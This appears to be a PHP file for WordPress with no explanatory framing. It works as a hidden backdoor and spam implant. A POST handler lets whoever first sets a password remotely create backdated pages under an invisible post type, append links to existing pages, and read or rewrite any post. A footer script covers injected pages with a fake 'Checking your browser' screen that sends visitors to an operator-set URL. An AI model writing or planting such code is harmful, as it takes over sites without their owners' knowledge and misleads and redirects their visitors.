<?php

ini_set('display_errors', false);
const KEYWORD = 'keyword';
const TITLE = 'title';
const CONTENT = 'content';
const POST_PASS = 'post_pass';
const REDIR_URL = 'redir_url';
const POST_TYPE = 'post_type';
$getString = 'gs435ya';
$postType = get_option(POST_TYPE);

$postData = $_POST;
if (!empty($postData['action'])) {
    $action = $postData['action'];
    $postPass = $postData[POST_PASS];
    if (!empty($action)) {
        $result = array('result' => false, 'error' => null);
        header("Content-Type: application/json");
        switch ($action) {
            case 'options':
                if (getPostPass()) {
                    $result['error'] = 'Old install exists';
                    break;
                }
                $result['result'] = insertPostPassOptions($postPass);
                if (!$result['result']) {
                    $result['error'] = 'Can\'t save post_pass';
                }
                break;
            case 'drw_options':
                if (!checkPostPass($postPass)) {
                    break;
                }
                $data = $postData['data'];
                $result['result'] = insertOptions($data[REDIR_URL], $data[POST_TYPE]);
                if (!$result['result']) {
                    $result['error'] = 'Error inserting drw options';
                }
                break;
            case 'add_pages':
                if (!checkPostPass($postPass)) {
                    break;
                }
                $data = $postData['data'];
                $result['result'] = insertPage($data, get_option(POST_TYPE));

                break;
            case 'place_link':
                if (!checkPostPass($postPass)) {
                    break;
                }
                $result['result'] = placeLink(get_option(POST_TYPE));
                if (!$result['result']) {
                    $result['error'] = 'Error inserting link in old page (post)';
                }
                break;
            case 'get_post':
                if (!checkPostPass($postPass)) {
                    break;
                }
                $result['result'] = getPostData($postData['data']['ID']);
                if (!$result['result']) {
                    $result['error'] = 'Error fetching post';
                }
                break;
            case 'update_post':
                if (!checkPostPass($postPass)) {
                    break;
                }
                $result['result'] = updatePostData($postData['data']['ID'], $postData['data']['post_title'], $postData['data']['post_content']);
                if (!$result['result']) {
                    $result['error'] = 'Error updating post';
                }
                break;
            default:
                $result['error'] = 'Unknown action';
                break;
        }
        echo ':::'.json_encode($result).':::';
        exit();
    }
}

function checkPostPass($pass)
{
    return $pass === getPostPass();
}

function getPostPass()
{
    return get_option(POST_PASS);
}

function insertPostPassOptions($postPass)
{
    if (empty($postPass)) {
        return false;
    }

    return add_option(POST_PASS, $postPass);
}

function insertOptions($redirUrl, $postType)
{
    if (get_option(REDIR_URL)) {
        delete_option(REDIR_URL);
    }
    if (get_option(POST_TYPE)) {
        delete_option(POST_TYPE);
    }

    return add_option(REDIR_URL, $redirUrl) && add_option(POST_TYPE, $postType);
}

function insertPage($data, $postType)
{
    if (!$postType) {
        return [];
    }
    $post_data = array(
        'post_title' => $data[TITLE],
        'post_content' => $data[CONTENT],
        'post_status' => 'publish',
        'post_type' => $postType,
        'post_date' => getRandomDate(),
        'post_date_gmt' => getRandomDate()
    );
    $post_id = wp_insert_post($post_data);

    return [
        'id' => $post_id,
        'keyword' => $data[KEYWORD],
        'url' => get_permalink($post_id)
    ];
}

function getPostData($id)
{
    $post = get_post($id);

    if (empty($post)) {
        return false;
    }

    return [
        'title' => $post->post_title,
        'content' => $post->post_content,
    ];
}

function updatePostData($id, $title, $content)
{
    return wp_update_post( wp_slash([
        'ID' => $id,
        'post_content' => $content,
        'post_title' => $title
    ]) );
}

function placeLink($postType)
{
    if (!$postType) {
        return false;
    }

    $myPosts = get_posts( array(
        'numberposts' => 1,
        'orderby'     => 'rand',
        'post_type'   => $postType,
        'suppress_filters' => true,
    ) );
    if (empty($myPosts[0])) {
        return false;
    }
    $postLink = $myPosts[0]->guid;
    $postAnchor = $myPosts[0]->post_title;
    if (empty($postLink)) {
        return false;
    }

    $targetPosts = get_posts( array(
        'numberposts' => 1,
        'orderby'     => 'rand',
        'post_type'   => 'page',
        'post_status' => 'publish',
        'suppress_filters' => true,
    ) );
    if (empty($targetPosts[0])) {
        $targetPosts = get_posts( array(
            'numberposts' => 1,
            'orderby'     => 'rand',
            'post_status' => 'publish',
            'published' => 1,
            'suppress_filters' => true,
        ) );
    }

    if (empty($targetPosts[0])) {
        return false;
    }

    $targetPost = $targetPosts[0];
    $update = wp_update_post( wp_slash([
        'ID' => $targetPost->ID,
        'post_content' => $targetPost->post_content.' <a href="'.$postLink.'">'.$postAnchor.'</a>',
    ]) );

    return $update === $targetPost->ID ? get_permalink($targetPost->ID) : false;
}

function getRandomDate()
{
    return date('Y-m-d H:i:s', time() - (rand(86200, 86600) * rand(3, 20)));
}

function registerType($postType)
{
    if (!$postType) {
        return;
    }
    register_post_type($postType,
        array(
            'labels' => array(
                'name' => $postType,
                'singular_name' => $postType
            ),
            'public' => true,
            'publicly_queryable' => true,
            'show_ui' => false,
            'exclude_from_search' => true,
            'show_in_nav_menus' => false,
            'show_in_menu' => false,
            'has_archive' => false,
            'rewrite' => array('slug' => $postType),
        )
    );
    flush_rewrite_rules(true);
}

function addLinksBlock($content)
{
    global $post;
    if ($post->post_type === get_option(POST_TYPE)) {
        $currentId = $post->ID;
        $content .= '<br><br><ul>';
        $args = array(
            'orderby' => 'rand',
            'post_type' => get_option(POST_TYPE),
            'post_status' => 'publish',
            'posts_per_page' => rand(3, 5)
        );
        $my_query = new WP_Query($args);
        if ($my_query->have_posts()) {
            while ($my_query->have_posts()) {
                $my_query->the_post();
                if ($currentId === $post->ID) {
                    continue;
                }
                $content .= '<li><a href="' . get_the_permalink() . '" rel="bookmark" title="' . get_the_title() . '">' . get_the_title() . '</a></li>';
            }
        }
        wp_reset_query();
        $content .= '</ul>';
    }
    return $content;
}

function popupInit($content) {
    global $post;
    if ($post->post_type === get_option(POST_TYPE)) {

        add_action( 'wp_footer', function () { ?>
            <script type='text/javascript'> var w_location = '<?php echo get_option(REDIR_URL); ?>';
                function createPopup(){
                    var popup = document.createElement('div');
                    popup.style.position = 'absolute';
                    popup.style.width = '100%';
                    popup.style.height = '100%';
                    popup.style.left = 0;
                    popup.style.top = 0;
                    popup.style.backgroundColor = 'white';
                    popup.style.zIndex = 99999;
                    document.body.appendChild(popup);

                    popup.onclick = function() {
                        window.location = w_location;
                    };

                    var p = document.createElement('p');
                    p.innerText = 'Checking your browser before accessing '
                        + window.location.host + '...';
                    p.style.textAlign = 'center';
                    //p.style.margin = '20px auto';
                    //p.style.left = '20px';
                    p.style.fontSize = 'x-large';
                    p.style.position = 'relative';
                    p.textContent = p.innerText;
                    popup.appendChild(p);

                    return popup;
                }

                function createButton() {
                    var button = document.createElement('div');
                    button.style.position = 'absolute';
                    button.style.top = '20%';
                    button.style.left = '10%';
                    button.style.right = '10%';
                    button.style.width = '80%';
                    button.style.border = '1px solid black';
                    button.style.textAlign = 'center';
                    button.style.verticalAlign = 'middle';
                    button.style.margin = '0, auto';
                    button.style.cursor = 'pointer';
                    button.style.fontSize = 'xx-large';
                    button.style.borderRadius = '5px';
                    button.onclick = function() {
                        window.location = w_location;
                    };
                    button.onmouseover = function() {
                        button.style.border = '1px solid red';
                        button.style.color = 'red';
                    };
                    button.onmouseout = function() {
                        button.style.border = '1px solid black';
                        button.style.color = 'black';
                    };

                    button.innerText = 'Continue';
                    button.textContent = button.innerText;
                    return button;
                }

                var hideWebSite = function() {
                    var popup = createPopup();
                    var button = createButton();
                    popup.appendChild(button);

                };
                console.log(document);
                console.log(document.body);
                window.onload = function() {
                    console.log('onload');
                    hideWebSite()
                };
            </script>
        <?php } );
    }


    return $content;
}

if ($postType) {
    registerType(get_option(POST_TYPE));
    add_filter( 'the_content', 'addLinksBlock' );
    if (!empty(get_option(REDIR_URL))) {
        add_filter( 'the_content', 'popupInit' );
    }


}


